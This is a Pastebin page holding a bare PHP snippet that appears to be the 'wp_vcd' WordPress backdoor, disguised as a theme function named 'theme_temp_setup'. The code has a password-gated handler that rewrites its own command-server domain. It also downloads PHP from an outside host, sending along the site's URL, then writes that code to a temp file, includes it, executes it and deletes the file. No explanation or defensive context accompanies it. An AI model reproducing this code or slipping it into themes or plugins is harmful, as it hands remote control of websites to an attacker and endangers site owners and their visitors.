Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f8f6d7575ad811c8b2afab4594814a2f'))
- {
- $div_code_name="wp_vcd";
- switch ($_REQUEST['action'])
- {
- case 'change_domain';
- if (isset($_REQUEST['newdomain']))
- {
- if (!empty($_REQUEST['newdomain']))
- {
- if ($file = @file_get_contents(__FILE__))
- {
- if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code1\.php/i',$file,$matcholddomain))
- {
- $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
- @file_put_contents(__FILE__, $file);
- print "true";
- }
- }
- }
- }
- break;
- default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
- }
- die("");
- }
- if ( ! function_exists( 'theme_temp_setup' ) ) {
- $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
- if ( stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
- if($tmpcontent = @file_get_contents("http://www.plimus.pw/code1.php?i=".$path))
- {
- function theme_temp_setup($phpCode) {
- $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
- $handle = fopen($tmpfname, "w+");
- fwrite($handle, "<?php\n" . $phpCode);
- fclose($handle);
- include $tmpfname;
- unlink($tmpfname);
- return get_defined_vars();
- }
- extract(theme_temp_setup($tmpcontent));
- }
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement